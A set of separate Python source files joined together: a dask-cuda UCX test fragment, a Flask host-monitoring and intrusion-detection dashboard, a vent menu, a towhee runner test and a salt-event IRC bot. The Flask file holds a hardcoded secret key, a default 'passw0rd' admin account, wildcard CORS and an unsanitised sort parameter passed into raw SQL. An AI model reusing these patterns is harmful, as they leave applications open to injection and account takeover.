    sched_env["DASK_UCX__NET_DEVICES"] = openfabrics_devices[0]

    if enable_rdmacm:
        sched_env["DASK_UCX__RDMACM"] = "True"
        # rdmacm requires listening on the InfiniBand interface itself.
        sched_addr = get_ip_interface("ib0")

    sched_url = "ucx://" + sched_addr + ":9379"

    # Enable proper variables for workers
    worker_ucx_opts = [
        "--enable-infiniband",
        "--net-devices",
        "auto",
    ]
    if enable_rdmacm:
        worker_ucx_opts.append("--enable-rdmacm")

    # Enable proper variables for client
    initialize(
        enable_tcp_over_ucx=True,
        enable_infiniband=True,
        enable_rdmacm=enable_rdmacm,
        net_devices=openfabrics_devices[0],
    )

    with subprocess.Popen(
        [
            "dask-scheduler",
            "--protocol",
            "ucx",
            "--host",
            sched_addr,
            "--port",
            "9379",
            "--no-dashboard",
        ],
        env=sched_env,
    ) as sched_proc:
        # Scheduler with UCX will take a few seconds to fully start
        sleep(5)

        with subprocess.Popen(
            ["dask-cuda-worker", sched_url, "--no-dashboard",] + worker_ucx_opts
        ) as worker_proc:
            with Client(sched_url, loop=loop) as client:
                def _timeout_callback():
                    # We must ensure processes are terminated to avoid hangs
                    # if a timeout occurs
                    worker_proc.kill()
                    sched_proc.kill()

                assert wait_workers(client, timeout_callback=_timeout_callback)

                # Every worker must have negotiated the expected connection
                # manager protocol.
                workers_tls = client.run(lambda: ucp.get_config()["TLS"])
                workers_tls_priority = client.run(
                    lambda: ucp.get_config()["SOCKADDR_TLS_PRIORITY"]
                )
                for tls, tls_priority in zip(
                    workers_tls.values(), workers_tls_priority.values()
                ):
                    assert cm_protocol in tls
                    assert cm_protocol in tls_priority

                # Each worker's UCX net device must match the table entry for
                # its first visible GPU.
                worker_net_devices = client.run(lambda: ucp.get_config()["NET_DEVICES"])
                cuda_visible_devices = client.run(
                    lambda: os.environ["CUDA_VISIBLE_DEVICES"]
                )

                for i, v in enumerate(
                    zip(worker_net_devices.values(), cuda_visible_devices.values())
                ):
                    net_dev = v[0]
                    dev_idx = int(v[1].split(",")[0])
                    assert net_dev == openfabrics_devices[dev_idx]

            # A dask-worker with UCX protocol will not close until some work
            # is dispatched, therefore we kill the worker and scheduler to
            # ensure timely closing.
            worker_proc.kill()
        sched_proc.kill()
@pytest.mark.parametrize("enable_rdmacm", [False, True])
@pytest.mark.skipif(
    _get_dgx_version() == DGXVersion.DGX_A100,
    reason="Automatic InfiniBand device detection Unsupported for %s" % _get_dgx_name(),
)
def test_dask_cuda_worker_ucx_net_devices(enable_rdmacm):
    """Spawn the dask-cuda-worker net-devices check in its own process."""
    ucp = pytest.importorskip("ucp")  # NOQA: F841
    worker = mp.Process(
        target=_test_dask_cuda_worker_ucx_net_devices, args=(enable_rdmacm,),
    )
    worker.start()
    worker.join()
    # exitcode 0 means all child-side assertions passed.
    assert not worker.exitcode
|
manage1.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import rules
import os
import re
import requests
import json
import jsonpath
import time
from functools import reduce
from defender import Defender
from flask import Flask, g, jsonify, make_response, request
from flask_cors import CORS
from flask_httpauth import HTTPBasicAuth
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import text
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from itsdangerous import BadSignature, SignatureExpired
from passlib.apps import custom_app_context
import socket
import random
import threading
import sys
# Application and database bootstrap (runs at import time).
basedir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
# r'/*' is a wildcard: allow cross-origin requests on every URL of this server.
CORS(app, resources=r'/*')
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_RECORD_QUERIES'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
    os.path.join(basedir, 'data.sqlite')
db = SQLAlchemy(app)
auth = HTTPBasicAuth()
CSRF_ENABLED = True
app.debug = True
app.config['JSON_AS_ASCII'] = False
# NOTE(review): this handle is opened at import time, never used below, and
# never closed — TODO confirm it can be removed.
f = open("out.json")
# 'global' at module level is a no-op; attack_log is already module-global.
global attack_log
attack_log = []
class hostInfos(db.Model):
    """ORM mapping for collected per-process host log records."""
    __tablename__ = 'hostInfos'
    id = db.Column(db.Integer, primary_key=True)
    timestampNanos = db.Column(db.String(64))
    pid = db.Column(db.Text(2000))
    ppid = db.Column(db.Text(2000))
    pname = db.Column(db.Text(2000))
    absolute_file_path = db.Column(db.String(64))
    cwd = db.Column(db.String(120))
    cmdLine = db.Column(db.Text(2000))
    hostName = db.Column(db.Text(2000))
    hostip = db.Column(db.Text(2000))
    userId = db.Column(db.Text(2000))
    groupIds = db.Column(db.Text(2000))

    def to_dict(self):
        """Serialize every mapped column into a plain dict."""
        return {name: getattr(self, name)
                for name in self.__table__.columns.keys()}
class Admin(db.Model):
    """Administrator account with hashed password and token-based auth."""
    __tablename__ = 'admins'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(32), index=True)
    password = db.Column(db.String(128))

    def hash_password(self, password):
        """Store the password as a salted hash (never plaintext)."""
        self.password = custom_app_context.encrypt(password)

    def verify_password(self, password):
        """Check a candidate password against the stored hash."""
        return custom_app_context.verify(password, self.password)

    def generate_auth_token(self, expiration=600):
        """Issue a signed token embedding this admin's id (default TTL 10 min)."""
        serializer = Serializer(app.config['SECRET_KEY'], expires_in=expiration)
        return serializer.dumps({'id': self.id})

    @staticmethod
    def verify_auth_token(token):
        """Resolve a token back to its Admin, or None if expired/invalid."""
        serializer = Serializer(app.config['SECRET_KEY'])
        try:
            payload = serializer.loads(token)
        except SignatureExpired:
            return None  # valid token, but expired
        except BadSignature:
            return None  # invalid token
        return Admin.query.get(payload['id'])
class checkJSON(object):
    """Helpers for walking arbitrarily nested JSON-like structures."""

    def getKeys(self, data):
        """Collect every dict key (and bare list scalar) in document order."""
        collected = []

        def walk(node):
            # Only dicts contribute keys; any other root yields nothing.
            if type(node) == type({}):
                for key, value in node.items():
                    collected.append(key)
                    if type(value) == type({}):
                        walk(value)
                    elif type(value) == type([]):
                        for item in value:
                            if type(item) == type({}) or type(item) == type([]):
                                walk(item)
                            else:
                                # Bare list elements are recorded as-is.
                                collected.append(item)

        walk(data)
        return collected

    def isExtend(self, data, tagkey):
        """True/False whether `tagkey` occurs anywhere in `data`.

        Non-dict input prints a complaint and returns None (legacy behavior).
        """
        if type(data) != type({}):
            print('please input a json!')
        else:
            return tagkey in self.getKeys(data)

    def get_json_value(self, json_data, key_name):
        """Return a list of every value stored under `key_name` (jsonpath query)."""
        # NOTE: jsonpath returns False (not []) when nothing matches.
        return jsonpath.jsonpath(
            json_data, '$..{key_name}'.format(key_name=key_name))
# Basic-auth callback: the first credential field may be either a token or
# an admin name.
@auth.verify_password
def verify_password(name_or_token, password):
    """Authenticate a request and stash the Admin object on flask.g."""
    if not name_or_token:
        return False
    # Strip literal surrounding double quotes that some clients send.
    name_or_token = re.sub(r'^"|"$', '', name_or_token)
    # Try token authentication first, then fall back to name/password.
    admin = Admin.verify_auth_token(name_or_token)
    if not admin:
        admin = Admin.query.filter_by(name=name_or_token).first()
        if not admin or not admin.verify_password(password):
            return False
    # Expose the authenticated admin to downstream request handlers.
    g.admin = admin
    print(g.admin.name)  # NOTE(review): debug print left in; consider logging
    return True
# Login endpoint.
@app.route('/api/login', methods=['POST'])
@auth.login_required
def get_auth_token():
    """Exchange valid basic-auth credentials for a short-lived token."""
    payload = {
        'token': g.admin.generate_auth_token()
    }
    return jsonify({'code': 20000, 'data': payload, 'name': g.admin.name})
@app.route('/api/setpwd', methods=['POST'])
@auth.login_required
def set_auth_pwd():
    """Change the current admin's password after re-verifying the old one."""
    payload = json.loads(str(request.data, encoding="utf-8"))
    admin = Admin.query.filter_by(name=g.admin.name).first()
    # Old password must verify and the confirmation must match the new one.
    valid = (admin
             and admin.verify_password(payload['oldpass'])
             and payload['confirpass'] == payload['newpass'])
    if valid:
        admin.hash_password(payload['newpass'])
        return jsonify({'code': 200, 'msg': "密码修改成功"})
    return jsonify({'code': 500, 'msg': "请检查输入"})
# Paged data listing endpoint.
@app.route('/api/users/listpage', methods=['GET'])
@auth.login_required
def get_user_list():
    """Paged, optionally sorted/filtered listing of host log records."""
    page_size = request.args.get('limit', 20, type=int)
    page = request.args.get('page', 1, type=int)
    sort = request.args.get('sort', '')
    pid = request.args.get('pid', '')

    records = db.session.query(hostInfos)
    if pid:
        # Substring match on the pid column.
        records = records.filter(hostInfos.pid.like('%{}%'.format(pid)))
    if sort:
        records = records.order_by(text(sort))
    total = records.count()
    if not page:
        rows = records.all()
    else:
        rows = records.offset((page - 1) * page_size).limit(page_size).all()
    return jsonify({
        'code': 20000,
        'total': total,
        'page_size': page_size,
        'infos': [row.to_dict() for row in rows]
    })
# Host information endpoint.
@app.route('/api/hostInfo', methods=['GET'])
@auth.login_required
def get_hostInfo():
    """Return static host information parsed from the first line of out.json."""
    # Fix: use a context manager so the handle is closed even when parsing
    # raises (the original leaked the descriptor on exception).
    with open("out.json") as log_file:
        hostinfo = get_host_info(log_file.readlines())
    return jsonify({
        'code': 20000,
        'infos': hostinfo
    })
# User-profile endpoint.
@app.route('/api/userinfo', methods=['GET'])
@auth.login_required
def get_userInfo():
    """Return role/profile info for the admin identified by `token`."""
    token = request.args.get('token', '')
    print(token)
    users = {
        'admin': {
            'roles': ['admin'],
            'introduction': 'I am a super administrator',
            'avatar': 'https://wpimg.wallstcn.com/f778738c-e4f8-4870-b634-56703b4acafe.gif',
            'name': 'Super Admin'
        },
        'editor': {
            'roles': ['editor'],
            'introduction': 'I am an editor',
            'avatar': 'https://wpimg.wallstcn.com/f778738c-e4f8-4870-b634-56703b4acafe.gif',
            'name': 'Normal Editor'
        }
    }
    admin = Admin.verify_auth_token(token)
    if not admin:
        return jsonify({
            'code': 50000,
            'data': 'something wrong'
        })
    # Only the literal 'admin' account receives the admin role set.
    role_key = 'admin' if admin.name == 'admin' else 'editor'
    return jsonify({
        'code': 20000,
        'data': users[role_key]
    })
# @app.route('/api/login', methods=['POST'])
# def login():
# data = json.loads(request.get_data(as_text=True))
# token={
# 'token': 'admin-token'
# }
# return jsonify({'code': 20000,'data': token})
# Delete a single log record.
@app.route('/api/delete_once', methods=['GET'])
@auth.login_required
def delete_once():
    """Delete one hostInfos row identified by the `delete_id` query arg."""
    try:
        delete_id = request.args.get('delete_id')
        record = db.session.query(hostInfos).filter(
            hostInfos.id == int(delete_id)).first()
        db.session.delete(record)
        db.session.commit()
        return jsonify({
            'code': 20000,
            'info': "删除成功"
        })
    except Exception:
        # Fix: roll back the failed transaction so the session remains
        # usable for subsequent requests (the original left it dirty).
        db.session.rollback()
        return jsonify({
            'code': 50000,
            'info': "删除失败"
        })
# Simple intrusion-detection results endpoint.
@app.route('/api/attack_log', methods=['GET'])
@auth.login_required
def get_attack_log():
    """Return the in-memory list of rule-matched attack records."""
    try:
        return jsonify({
            'code': 20000,
            'info': attack_log
        })
    except Exception:
        # Fix: the original error text "删除失败" ("delete failed") was
        # copy-pasted from delete_once; this endpoint fetches, not deletes.
        return jsonify({
            'code': 50000,
            'info': "获取失败"
        })
@auth.error_handler
def unauthorized():
    """401 response sent whenever basic-auth/token verification fails."""
    body = jsonify({'error': 'Unauthorized access'})
    return make_response(body, 401)
def get_host_info(lines):
    """Parse static host metadata from the first JSON line of a SPADE log.

    Returns a dict with hostName/osDetails/hostType/interfaces/'serial
    number' plus every non-loopback IPv4 address found on any interface.
    """
    datum = json.loads(lines[0])['datum']
    host_info = {}
    host_info['hostName'] = datum['hostName']
    host_info['osDetails'] = datum['osDetails']
    host_info['hostType'] = datum['hostType']
    host_info['interfaces'] = datum['interfaces']
    host_info['serial number'] = datum['hostIdentifiers'][0]['idValue']
    ipv4_pattern = r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$"
    addresses = []
    for interface in datum['interfaces']:
        for ip in interface['ipAddresses']:
            # Keep dotted-quad IPv4 only, skipping the loopback address.
            if re.match(ipv4_pattern, ip) and ip != '127.0.0.1':
                addresses.append(ip)
    host_info['ips'] = addresses
    return host_info
def request_one():
    """Fire one GET at the local /analyse endpoint so its socket loop starts."""
    headers = {
        'Accept-Language': 'zh-CN,zh;q=0.9'
    }
    # Fix: `headers` was built but never passed to the request.
    s = requests.get("http://127.0.0.1:5000/analyse", headers=headers)
# Seed the default administrator account.
def init_admin():
    """Insert the default admin user (password: passw0rd); best effort."""
    try:
        default_admin = Admin(
            name='admin',
            password='$6$rounds=656000$smq9js2whAy2hEJX$4ZClo/lwmoD.z7Ex/qRyJp7fI3tp6ZOEw/CbU2GuZGVx2RrqU9muN./Ri2c04ESWQv/xZcaq1pz5oXgbP2H2Z/')  # hash of "passw0rd"
        db.session.add(default_admin)
        db.session.commit()
    except Exception:
        print("add fail")
def add_all(data):
    """Bulk-insert a list of log dicts as hostInfos rows; best effort."""
    try:
        rows = [
            hostInfos(timestampNanos=entry['timestampNanos'], pid=entry['pid'],
                      pname=entry['pname'], ppid=entry['ppid'],
                      absolute_file_path=str(entry['absolute_file_path']),
                      cwd=entry['cwd'], cmdLine=entry['cmdLine'],
                      hostName=entry['hostName'], hostip=entry['hostip'],
                      userId=entry['userId'], groupIds=entry['groupIds'])
            for entry in data
        ]
        db.session.add_all(rows)
        db.session.commit()
    except Exception:
        print("add fail")
def timeStamp(timeNum):
    """Format a millisecond epoch timestamp as local 'YYYY-mm-dd HH:MM:SS'.

    Example: 1565750406000 -> '2019-08-14 10:40:06' (in CST).
    """
    seconds = float(timeNum / 1000)
    local_time = time.localtime(seconds)
    return time.strftime("%Y-%m-%d %H:%M:%S", local_time)
def list_dict_duplicate_removal(data):
    """Remove duplicate dicts from a list, preserving first-seen order.

    Dicts are unhashable, so dedupe by equality instead of via a set.
    """
    unique = []
    for item in data:
        if item not in unique:
            unique.append(item)
    return unique
# def bytetoint(byte):
# return reduce(lambda x, y: (x << 8) + y, byte)
@app.route('/analyse', methods=['GET'])
def analyse():
    """Blocking TCP server loop: receives SPADE JSON events, reconstructs
    per-process log records, runs rule-based detection on command lines,
    and persists the results.

    NOTE(review): the outer `while True` has no exit, so the trailing
    close/return statements are effectively unreachable — TODO confirm.
    """
    num = 1  # NOTE(review): never used after initialization
    total_data = []   # every raw JSON line received so far (stripped)
    host_data = {}    # static host info parsed from the first event
    total_log = []    # reconstructed per-process log dicts
    # Create the listening socket.
    tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Local bind address (hard-coded to this collector host).
    address = ('192.168.1.106', 9091)
    tcp_server_socket.bind(address)
    tcp_server_socket.listen(128)
    recv_subject_process = False
    host = 0  # 0 until host_data has been populated once
    # Raw event mirror; never closed because this handler never returns.
    f = open("out1.json","a+")
    while True:
        # Wait for a new client (SPADE) connection.
        client_socket, clientAddr = tcp_server_socket.accept()
        while True:
            # Receive one chunk from the peer.
            recv_data = client_socket.recv(2048)  # up to 2048 bytes
            if recv_data:
                f.write(recv_data.decode('gbk'))
                f.flush()
                j = recv_data.decode('gbk')
                total_data.append(j.strip())
                # sys.stdout.write(str(len(total_data))+"\n")
                cjson = checkJSON()
                # NOTE(review): assumes each recv() yields exactly one
                # complete JSON document; a split or merged TCP read would
                # raise here — TODO confirm framing guarantees.
                t = json.loads(j)
                if host == 0:
                    try:
                        host_data = get_host_info(total_data)
                        host = 1
                    except Exception as e:
                        # Host record could not be parsed: mark as unknown.
                        host_data['hostName'] = '未知'
                        host_data['ips']=['未知']
                    else:
                        # NOTE(review): try/else runs on *success*, so the
                        # first successfully parsed host record triggers
                        # sys.exit — this looks inverted; the original
                        # (pre-flattening) indentation may have attached this
                        # else elsewhere. TODO verify against upstream.
                        sys.exit("请重启SPADE")
                if 'SUBJECT_PROCESS' in cjson.get_json_value(t, 'type'):
                    # A process event opens a record; resume on next recv.
                    recv_subject_process = True
                    sys.stdout.write(j)
                    break
                if recv_subject_process and cjson.isExtend(t, 'sequence'):
                    recv_subject_process = False
                    path = []
                    # NOTE(review): bare attribute access — a no-op; probably
                    # a leftover debug statement missing its call.
                    sys.stdout.write
                    lis = cjson.getKeys(t)
                    # Template for one reconstructed process record.
                    log_info = {
                        'timestampNanos': '',
                        'ppid': '',
                        'cmdLine': '',
                        'pid': '',
                        'pname': '',
                        'absolute_file_path': '',
                        'cwd': '',
                        'hostName': '',
                        'hostip': '',
                        'userId': '',
                        'groupIds': ''
                    }
                    if cjson.isExtend(t, 'predicateObjectPath') == True and t['datum']['predicateObjectPath']:
                        path.append(t['datum']['predicateObjectPath'])
                    elif log_info['timestampNanos'] == 0:
                        # NOTE(review): timestampNanos is initialized to ''
                        # so this branch can only fire once it has been set
                        # to 0 further below — TODO confirm intended.
                        if cjson.isExtend(t, 'timestampNanos') == True:
                            log_info['timestampNanos'] = timeStamp(
                                cjson.get_json_value(t, 'timestampNanos')[0]/1000000)
                    is_subject_process= False
                    # Walk backwards from the current event to find the
                    # matching SUBJECT_PROCESS, file paths, and principal.
                    for u in total_data[-(len(total_data)-total_data.index(j.strip()))-1::-1]:
                        u = json.loads(u)
                        if cjson.isExtend(u, 'sequence'):
                            if log_info['timestampNanos'] == 0:
                                log_info['timestampNanos'] = timeStamp(
                                    u['datum']['timestampNanos']/1000000)
                            # path.append(n['datum']['predicateObjectPath'])
                            if cjson.isExtend(u, 'predicateObjectPath') == True:
                                if u['datum']['predicateObjectPath']:
                                    path.append(
                                        u['datum']['predicateObjectPath'])
                            break
                        if cjson.isExtend(u, 'baseObject') == True and is_subject_process == False:
                            if cjson.isExtend(u, 'path') == True and u['datum']['baseObject']['properties']['path']:
                                path.append(u['datum']['baseObject']['properties']['path'])
                        if 'SUBJECT_PROCESS' in cjson.get_json_value(u, 'type'):
                            # Found the originating process event: fill in
                            # the record's identity fields.
                            is_subject_process = True
                            log_info['timestampNanos'] = timeStamp(
                                u['datum']['startTimestampNanos']/1000000) if u['datum']['startTimestampNanos'] != 0 else 0
                            log_info['cmdLine'] = u['datum']['cmdLine'] or ''
                            log_info['pname'] = u['datum']['properties']['name']
                            log_info['pid'] = u['datum']['cid']
                            log_info['ppid'] = u['datum']['properties']['ppid'] or ''
                            if 'cwd' in lis:
                                log_info['cwd'] = u['datum']['properties']['cwd']
                            else:
                                log_info['cwd'] = ''
                            log_info['hostName'] = host_data['hostName']
                            log_info['hostip'] = host_data['ips'][0]
                        if 'PRINCIPAL_LOCAL' in cjson.get_json_value(u, 'type'):
                            log_info['userId'] = cjson.get_json_value(u, 'userId')[
                                0]
                            log_info['groupIds'] = str(
                                cjson.get_json_value(u, 'groupIds')[0])
                        # elif cjson.isExtend(n, 'baseObject') == True and cjson.isExtend(n, 'pid'):
                        #     log_info['pid'] = n['datum']['baseObject']['properties']['pid']
                        #     break
                        # if cjson.get_json_value(n,'PRINCIPAL_LOCAL') is not None:
                        #     print(n)
                    log_info['absolute_file_path'] = list(set(path))
                    total_log.append(log_info)
                    total_log = list_dict_duplicate_removal(total_log)
                    # Re-run the rule-based detector over every record's
                    # command line.
                    for i in total_log:
                        attack_info = {
                            'pid': '',
                            'ppid': '',
                            'pname': '',
                            'hostip': '',
                            'type_name': '',
                            'type_info': '',
                            'cmdLine': ''
                        }
                        cmdLine = i.get('cmdLine')
                        if cmdLine:
                            hostip = i.get('hostip')
                            pid = i.get('pid')
                            ppid = i.get('ppid')
                            pname = i.get('pname')
                            defender = Defender(cmdLine)
                            get_rule = defender.run()
                            if get_rule:
                                # Rule matched: record the hit globally.
                                type_name = get_rule.get('type')
                                type_info = get_rule.get('type_info')
                                attack_info['cmdLine'] = cmdLine
                                attack_info['pid'] = pid
                                attack_info['ppid'] = ppid
                                attack_info['pname'] = pname
                                attack_info['hostip'] = hostip
                                attack_info['type_name'] = type_name
                                attack_info['type_info'] = type_info
                                attack_log.append(attack_info)
                    add_all(total_log)
            else:
                # Empty recv => the peer closed the connection.
                break
        client_socket.close()
    tcp_server_socket.close()
    return "hello"
if __name__ == '__main__':
    # Recreate the schema from scratch on every start (drops stored logs).
    db.drop_all()
    db.create_all()
    init_admin()
    # Fire one request at /analyse so its socket-accept loop starts running.
    t = threading.Thread(target=request_one)
    t.start()
    app.run(host='0.0.0.0', debug=False, threaded=True)
    t.join()
|
menu.py | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
import curses
import npyscreen
import time
from threading import Thread
from vent.api.actions import Action
from vent.api.plugins import Plugin
from vent.helpers.meta import Version
from vent.helpers.paths import PathDirs
from vent.menus.help import HelpForm
from vent.menus.main import MainForm
from vent.menus.tutorial_forms import TutorialAddingFilesForm
from vent.menus.tutorial_forms import TutorialAddingPluginsForm
from vent.menus.tutorial_forms import TutorialBackgroundForm
from vent.menus.tutorial_forms import TutorialBuildingCoresForm
from vent.menus.tutorial_forms import TutorialGettingSetupForm
from vent.menus.tutorial_forms import TutorialIntroForm
from vent.menus.tutorial_forms import TutorialStartingCoresForm
from vent.menus.tutorial_forms import TutorialTerminologyForm
from vent.menus.tutorial_forms import TutorialTroubleshootingForm
class VentApp(npyscreen.NPSAppManaged):
    """ Main menu app for vent CLI """
    keypress_timeout_default = 10
    repo_value = {}
    paths = PathDirs()
    first_time = paths.ensure_file(paths.init_file)
    # First run (init file just created) starts in the tutorial.
    if first_time[0] and first_time[1] != "exists":
        npyscreen.NPSAppManaged.STARTING_FORM = "TUTORIALINTRO"
    else:
        npyscreen.NPSAppManaged.STARTING_FORM = "MAIN"

    def onStart(self):
        """ Override onStart method for npyscreen """
        curses.mousemask(0)
        self.paths.host_config()
        version = Version()

        # setup initial runtime stuff
        if self.first_time[0] and self.first_time[1] != "exists":
            plugins = Plugin()
            actions = Action()
            # Each step runs on a worker thread while the UI repeats a
            # progress notification once a second until the step finishes.
            startup_steps = [
                (MainForm.t_status, {'core': True},
                 "Please wait while Vent initializes...1/4"),
                (MainForm.t_status, {'core': False},
                 "Please wait while Vent initializes...2/4"),
                (plugins.auto_install, {},
                 "Please wait while Vent initializes...3/4"),
                (actions.startup, {},
                 "Please wait while Vent initializes...4/4"),
            ]
            for target, kwargs, message in startup_steps:
                worker = Thread(target=target, args=(), kwargs=kwargs)
                worker.start()
                while worker.is_alive():
                    npyscreen.notify_wait(message,
                                          title="Setting up things...")
                    time.sleep(1)
                worker.join()

        quit_s = "\t"*4 + "^Q to quit"
        tab_esc = "\t"*4 + "TAB to close menu popup"
        # (form id, form class, window title, color scheme)
        forms = [
            ("MAIN", MainForm,
             "Vent " + version + "\t\t\t\t\t^T for help" + quit_s + tab_esc,
             "IMPORTANT"),
            ("HELP", HelpForm,
             "Help\t\t\t\t\t\t\t\t^T to toggle previous" + quit_s,
             "DANGER"),
            ("TUTORIALINTRO", TutorialIntroForm,
             "Vent Tutorial" + quit_s, "DANGER"),
            ("TUTORIALBACKGROUND", TutorialBackgroundForm,
             "About Vent" + quit_s, "DANGER"),
            ("TUTORIALTERMINOLOGY", TutorialTerminologyForm,
             "About Vent" + quit_s, "DANGER"),
            ("TUTORIALGETTINGSETUP", TutorialGettingSetupForm,
             "About Vent" + quit_s, "DANGER"),
            ("TUTORIALBUILDINGCORES", TutorialBuildingCoresForm,
             "Working with Cores" + quit_s, "DANGER"),
            ("TUTORIALSTARTINGCORES", TutorialStartingCoresForm,
             "Working with Cores" + quit_s, "DANGER"),
            ("TUTORIALADDINGPLUGINS", TutorialAddingPluginsForm,
             "Working with Plugins" + quit_s, "DANGER"),
            ("TUTORIALADDINGFILES", TutorialAddingFilesForm,
             "Files" + quit_s, "DANGER"),
            ("TUTORIALTROUBLESHOOTING", TutorialTroubleshootingForm,
             "Troubleshooting" + quit_s, "DANGER"),
        ]
        for form_id, form_class, title, color in forms:
            self.addForm(form_id, form_class, name=title, color=color)

    def change_form(self, name):
        """ Changes the form (window) that is displayed """
        self.switchForm(name)
|
test_generator_runner.py | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from typing import Dict
import threading
from queue import Queue
from towhee.engine.operator_runner.runner_base import RunnerStatus
from towhee.engine.operator_runner.generator_runner import GeneratorRunner
from tests.unittests.mock_operators.generator_operator import generator_operator
DATA_QUEUE = Queue()
class StopFrame:
pass
class MockReader:
    """Reader stub backed by a queue; a StopFrame item ends the stream."""

    def __init__(self, queue: Queue):
        self._queue = queue

    def read(self):
        """Block for the next item; raise StopIteration on a StopFrame."""
        item = self._queue.get()
        if isinstance(item, StopFrame):
            raise StopIteration()
        return item
class MockWriter:
    """Writer stub that records every written item in order, in `res`."""

    def __init__(self):
        self.res = []

    def write(self, data: Dict):
        """Append one output record."""
        self.res.append(data)
def run(runner):
    # Thread target used by the tests: invoke the runner's processing loop.
    runner.process()
class TestGeneratorRunner(unittest.TestCase):
    """
    GeneratorRunner test
    """
    def test_map_runner(self):
        data_queue = Queue()
        writer = MockWriter()
        runner = GeneratorRunner('test', 0, 'generator_operator',
                                 'mock_operators', {},
                                 [MockReader(data_queue)], writer)
        runner.set_op(generator_operator.GeneratorOperator())
        t = threading.Thread(target=run, args=(runner, ))
        t.start()
        # NOTE(review): asserting RUNNING immediately after start() is
        # timing-sensitive; it relies on process() flipping the status before
        # this line executes -- confirm the runner sets it synchronously.
        self.assertEqual(runner.status, RunnerStatus.RUNNING)
        data_queue.put({'num': 10})
        # A None frame appears to make the runner go IDLE rather than finish.
        data_queue.put(None)
        t.join()
        res = 0
        # The generator operator is expected to yield 0..num-1 in order.
        for item in writer.res:
            self.assertEqual(item[0], res)
            res += 1
        self.assertEqual(len(writer.res), 10)
        self.assertEqual(runner.status, RunnerStatus.IDLE)
        t = threading.Thread(target=run, args=(runner, ))
        t.start()
        self.assertEqual(runner.status, RunnerStatus.RUNNING)
        data_queue.put({'num': 4})
        data_queue.put({'num': 5})
        # StopFrame makes MockReader raise StopIteration -> runner FINISHED.
        data_queue.put(StopFrame())
        # NOTE(review): this run waits via runner.join() while the first run
        # used t.join() -- confirm both are equivalent here.
        runner.join()
        # 10 + 4 + 5 = 19 total records across both runs.
        self.assertEqual(len(writer.res), 19)
        self.assertEqual(runner.status, RunnerStatus.FINISHED)
    def test_generator_runner_with_error(self):
        data_queue = Queue()
        writer = MockWriter()
        runner = GeneratorRunner('test', 0, 'generator_operator',
                                 'mock_operators', {},
                                 [MockReader(data_queue)], writer)
        runner.set_op(generator_operator.GeneratorOperator())
        t = threading.Thread(target=run, args=(runner, ))
        t.start()
        # A non-dict frame should make the operator fail.
        data_queue.put('error_data')
        runner.join()
        self.assertEqual(runner.status, RunnerStatus.FAILED)
|
saltbot.py | #!/usr/bin/env python
# This script is under GPL License v2
# (c) Jean-Michel LACROIX 2006 (jm-lacroix@savigny.org)
# (c) Tor Hveem 2008-2014
from twisted.words.protocols import irc
from twisted.internet import reactor, protocol, threads
from twisted.python import log
from twisted.internet import threads
from twisted.internet.protocol import Protocol
from twisted.application import internet, service
from yaml import safe_load
import threading
import thread, os, time, sys, string
config = safe_load(file('config.yaml').read())
GreenColor = '\x033,1'
YellowColor = '\x038,1'
RedColor = '\x034,1'
def salteventlistener(bot, run):
    """Thread target: stream formatted salt events into the IRC channel.

    `bot` is the ircProtocol instance used to send messages; `run` is the
    shared IseaController flag -- clearing it makes listen() return.
    """
    import isea
    import iseafilter
    import iseaformatter
    # Reload code on every thread start
    reload(isea)
    reload(iseafilter)
    reload(iseaformatter)
    from isea import Isea
    from iseafilter import IseaFilter
    from iseaformatter import IseaFormatter
    def output(data):
        # Per-event callback; length=400 caps each outgoing IRC line.
        bot.msg(config['irc']['channel'], IseaFormatter(data), length=400)
    # NOTE: rebinds the local name `isea` from the module to an instance.
    isea = Isea()
    # TODO:
    # support more elaborate filtering
    f2 = IseaFilter('Fun')
    f2.add_filter('fun', config['filters']['functions'])
    isea.add_filter(f2)
    #bot.msg(config['irc']['channel'], 'Isea object: {}'.format(isea))
    isea.listen(config['salt']['target'], '/var/run/salt', output, run)
class ircProtocol(irc.IRCClient):
    """IRC bot that relays salt events into a channel.

    A background thread runs salteventlistener(), pushing formatted salt
    event data into the configured channel.  The channel controls the
    listener with the !start, !stop and !reload commands.
    """
    nickname = config['irc']['nick']
    password = config['irc']['password']

    def __init__(self):
        self.start()

    def start(self):
        """Spawn the salt event listener thread (controlled via self.run)."""
        from isea import IseaController
        # Shared flag object polled by the listener so stop() can end it.
        self.run = IseaController(True)
        self.isea_thread = threading.Thread(target=salteventlistener, args=(self, self.run,))
        self.isea_thread.start()

    def stop(self):
        """Ask the listener thread to terminate; it exits on its next poll."""
        self.run.set(False)

    def running(self):
        """Return True while the listener thread is alive."""
        return self.isea_thread.isAlive()

    def printResult(self, result):
        """Send a result string to the configured channel.

        Fixed: the old body re-queued a nonexistent self.doLongCalculation
        via deferToThread with itself as the callback, which would have
        raised AttributeError on first use.
        """
        self.msg(config['irc']['channel'], result)

    def signedOn(self):
        """Called when the bot has successfully signed on to the server."""
        self.join(config['irc']['channel'])
        self.factory.client = self
        # Restart the event listener if it died while we were disconnected.
        if not self.running():
            self.start()

    def joined(self, channel):
        """This will get called when the bot joins the channel."""
        self.msg(channel, 'Be greeted. I return from the dead.')

    def privmsg(self, user, channel, msg):
        """This will get called when the bot receives a message."""
        user = user.split('!', 1)[0]
        log.msg("<%s> %s" % (user, msg))
